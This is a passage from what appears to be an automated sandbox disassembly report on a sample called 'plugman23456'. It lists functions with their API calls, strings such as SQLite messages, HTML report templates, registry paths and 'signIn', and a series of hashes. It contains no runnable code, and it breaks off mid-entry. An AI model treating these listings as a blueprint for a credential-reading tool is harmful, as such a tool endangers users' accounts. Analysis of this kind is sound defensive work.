                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040D8BD
                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                          • memset.MSVCRT ref: 0040D906
                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                          • _wcsicmp.MSVCRT ref: 0040D92F
                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                          • String ID: sysdatetimepick32
                          • API String ID: 1028950076-4169760276
                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: -journal$-wal
                          • API String ID: 438689982-2894717839
                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                          • EndDialog.USER32(?,00000002), ref: 00405C83
                          • EndDialog.USER32(?,00000001), ref: 00405C98
                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Dialog$MessageSend
                          • String ID:
                          • API String ID: 3975816621-0
                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                          Download Yara Rule
                          APIs
                          • _wcsicmp.MSVCRT ref: 00444D09
                          • _wcsicmp.MSVCRT ref: 00444D1E
                          • _wcsicmp.MSVCRT ref: 00444D33
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$wcslen$_memicmp
                          • String ID: .save$http://$https://$log profile$signIn
                          • API String ID: 1214746602-2708368587
                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                          • String ID:
                          • API String ID: 2313361498-0
                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00405F65
                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                          • GetWindow.USER32(00000000), ref: 00405F80
                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$ItemMessageRectSend$Client
                          • String ID:
                          • API String ID: 2047574939-0
                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                          • String ID:
                          • API String ID: 4218492932-0
                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                          • memcpy.MSVCRT ref: 0044A8BF
                          • memcpy.MSVCRT ref: 0044A90C
                          • memcpy.MSVCRT ref: 0044A988
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                          • memcpy.MSVCRT ref: 0044A9D8
                          • memcpy.MSVCRT ref: 0044AA19
                          • memcpy.MSVCRT ref: 0044AA4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                          Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                          • wcslen.MSVCRT ref: 0040BE06
                          • _wcsncoll.MSVCRT ref: 0040BE38
                          • memset.MSVCRT ref: 0040BE91
                          • memcpy.MSVCRT ref: 0040BEB2
                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                          • wcschr.MSVCRT ref: 0040BF24
                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$FreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                          • String ID:
                          • API String ID: 1313804837-0
                          • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                          • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                          • API String ID: 3510742995-2446657581
                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                          • memset.MSVCRT ref: 00405ABB
                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                          • SetFocus.USER32(?), ref: 00405B76
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$FocusItemmemset
                          • String ID:
                          • API String ID: 4281309102-0
                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfwcscat
                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                          • API String ID: 384018552-4153097237
                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetwcschr
                          • String ID: 0$6
                          • API String ID: 2029023288-3849865405
                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                          • memset.MSVCRT ref: 00405455
                          • memset.MSVCRT ref: 0040546C
                          • memset.MSVCRT ref: 00405483
                          • memcpy.MSVCRT ref: 00405498
                          • memcpy.MSVCRT ref: 004054AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy$ErrorLast
                          • String ID: 6$\
                          • API String ID: 404372293-1284684873
                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                          Download Yara Rule
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                          • wcscpy.MSVCRT ref: 0040A0D9
                          • wcscat.MSVCRT ref: 0040A0E6
                          • wcscat.MSVCRT ref: 0040A0F5
                          • wcscpy.MSVCRT ref: 0040A107
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                          • String ID:
                          • API String ID: 1331804452-0
                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • <?xml version="1.0" ?>, xrefs: 0041007C
                          • <%s>, xrefs: 004100A6
                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                          • API String ID: 3473751417-2880344631
                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset
                          • String ID: %2.2X
                          • API String ID: 2521778956-791839006
                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfwcscpy
                          • String ID: dialog_%d$general$menu_%d$strings
                          • API String ID: 999028693-502967061
                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                          Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memsetstrlen
                          • String ID:
                          • API String ID: 2350177629-0
                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                          Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                          • API String ID: 2221118986-1606337402
                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                          Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                          • String ID:
                          • API String ID: 265355444-0
                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                          • memset.MSVCRT ref: 0040C439
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                          • _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          • memset.MSVCRT ref: 0040C4D0
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                          • String ID:
                          • API String ID: 1973883786-0
                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004116FF
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                          Strings
                          Memory Dump Source
